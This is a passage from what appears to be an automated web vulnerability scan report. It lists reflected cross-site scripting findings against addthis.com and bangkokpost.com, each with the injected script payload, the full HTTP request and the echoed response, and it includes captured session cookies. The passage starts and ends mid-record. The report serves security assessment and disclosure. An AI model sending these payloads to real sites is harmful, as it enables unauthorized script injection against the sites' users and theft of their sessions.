Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:52 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai2a45d"-alert(1)-"f304ccb4a0e/optout";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.173. http://www.addthis.com/api/nai/optout [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9a7f4<script>alert(1)</script>0409d681e46 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai9a7f4<script>alert(1)</script>0409d681e46/optout?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:14:53 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai9a7f4<script>alert(1)</script>0409d681e46/optout?nocache=0.8710141</strong>
...[SNIP]...

6.174. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8f8d1<script>alert(1)</script>1877ca655c6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/optout8f8d1<script>alert(1)</script>1877ca655c6?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:15:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/optout8f8d1<script>alert(1)</script>1877ca655c6?nocache=0.8710141</strong>
...[SNIP]...

6.175. http://www.addthis.com/api/nai/optout [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/optout

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9a7c1"-alert(1)-"581a1ca5be1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/optout9a7c1"-alert(1)-"581a1ca5be1?nocache=0.8710141 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/optout_results.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:15:00 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/optout9a7c1"-alert(1)-"581a1ca5be1";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.176. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1eb37<script>alert(1)</script>c896db9bd8b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api1eb37<script>alert(1)</script>c896db9bd8b/nai/status?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api1eb37<script>alert(1)</script>c896db9bd8b/nai/status?nocache=0.2280698</strong>
...[SNIP]...

6.177. http://www.addthis.com/api/nai/status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7b37c"-alert(1)-"14aad95f105 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api7b37c"-alert(1)-"14aad95f105/nai/status?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:16 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api7b37c"-alert(1)-"14aad95f105/nai/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.178. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 942a7<script>alert(1)</script>435b8dfe5d3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai942a7<script>alert(1)</script>435b8dfe5d3/status?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:24 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai942a7<script>alert(1)</script>435b8dfe5d3/status?nocache=0.2280698</strong>
...[SNIP]...

6.179. http://www.addthis.com/api/nai/status [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e5085"-alert(1)-"83e377b5ce8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/naie5085"-alert(1)-"83e377b5ce8/status?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:23 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/naie5085"-alert(1)-"83e377b5ce8/status";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.180. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 69938<script>alert(1)</script>ae1accd2c77 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/nai/status69938<script>alert(1)</script>ae1accd2c77?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:31 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1413
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>api/nai/status69938<script>alert(1)</script>ae1accd2c77?nocache=0.2280698</strong>
...[SNIP]...

6.181. http://www.addthis.com/api/nai/status [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /api/nai/status

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef88a"-alert(1)-"3fd753a0812 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/nai/statusef88a"-alert(1)-"3fd753a0812?nocache=0.2280698 HTTP/1.1
Host: www.addthis.com
Proxy-Connection: keep-alive
Referer: http://www.networkadvertising.org/managing/opt_out.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; uit=1; di=%7B%226%22%3A%226422714091563403120%22%7D..1315071225.1WV|1315071141.1EY|1315071141.60|1315071141.1FE|1315071141.10R|1314983342.1OD; dt=X; uid=4e5e3f1ae3fd7427; uvc=34|35; psc=2

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 11:00:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1387
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/api/nai/statusef88a"-alert(1)-"3fd753a0812";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.182. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8ab2"-alert(1)-"76cd37db81e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.phpb8ab2"-alert(1)-"76cd37db81e HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 04:24:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1307
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.phpb8ab2"-alert(1)-"76cd37db81e";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.183. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c84f5<script>alert(1)</script>cc3659a92fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.phpc84f5<script>alert(1)</script>cc3659a92fa HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sun, 04 Sep 2011 04:24:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Content-Length: 1333
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.phpc84f5<script>alert(1)</script>cc3659a92fa</strong>
...[SNIP]...

6.184. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4d745"-alert(1)-"eb9fa95a481 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/4d745"-alert(1)-"eb9fa95a481 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:23:38 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 92745

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookmarking Sharing Button Widget</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/4d745"-alert(1)-"eb9fa95a481";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._trackPageview(u);
}
</script>
...[SNIP]...

6.185. http://www.bangkokpost.com/_event.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /_event.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 62139<script>alert(1)</script>6e7f71f917a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_event.php?xData=2011-09-04&xURI=/busin/62139<script>alert(1)</script>6e7f71f917aess/ HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; _cbclose62518=1; _uid62518=2BAEE501.1; verify=test; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:05:39 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 1875
Content-Type: text/html; charset=utf-8

<li><strong><a href='javascript:window.location.href="/busin/62139<script>alert(1)</script>6e7f71f917aess//search-event/date_2011-09-04"'>04 September 2011</a></strong></li><li><p class="time"><strong
...[SNIP]...

6.186. http://www.bangkokpost.com/_event.php [xURI parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /_event.php

Issue detail

The value of the xURI request parameter is copied into the HTML document as plain text between tags. The payload 6f8a8<script>alert(1)</script>2754bbf4de2 was submitted in the xURI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_event.php?xData=2011-09-04&xURI=6f8a8<script>alert(1)</script>2754bbf4de2 HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/business/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __se=YTo2OntzOjk6IlNFU1NJT05JRCI7czoyNjoiZGlmbjBkYzA1YXZxbnNyamJicjNkM2NvZTMiO3M6MTQ6IkNPT0tJRV9TRVNTSU9OIjtzOjQ6Il9fc2UiO3M6MjA6IlNUQVRVU19TVEFSVF9TRVNTSU9OIjtzOjc6IlNVQ0NFU1MiO3M6MDoiIjtOO3M6OToiY29va2llX2lwIjtzOjEzOiI1MC4yMy4xMjMuMTA2IjtzOjY6IlNUQVRVUyI7czo3OiJzdWNjZXNzIjt9; PHPSESSID=s4m8rs24o8o6s2ql7dbjgud8m7; _cbclose62518=1; _uid62518=2BAEE501.1; verify=test; __utma=42595382.1672749663.1315103143.1315103143.1315103143.1; __utmb=42595382.2.10.1315103143; __utmc=42595382; __utmz=42595382.1315103143.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _cbclose=1; _ctout62518=1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 02:55:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Content-Length: 1864
Content-Type: text/html; charset=utf-8

<li><strong><a href='javascript:window.location.href="6f8a8<script>alert(1)</script>2754bbf4de2/search-event/date_2011-09-04"'>04 September 2011</a></strong></li><li><p class="time"><strong>20:15 - 22
...[SNIP]...

6.187. http://www.bangkokpost.com/_getContent_main.php [geography parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /_getContent_main.php

Issue detail

The value of the geography request parameter is copied into the HTML document as plain text between tags. The payload 15b68<script>alert(1)</script>7ad9cf98271 was submitted in the geography parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /_getContent_main.php?cate_path=,,5,,37,,&sortBy=lasted&orderBy=&limitPerPage=2&geography=Bangkok+%26+greater15b68<script>alert(1)</script>7ad9cf98271 HTTP/1.1
Host: www.bangkokpost.com
Proxy-Connection: keep-alive
Referer: http://www.bangkokpost.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
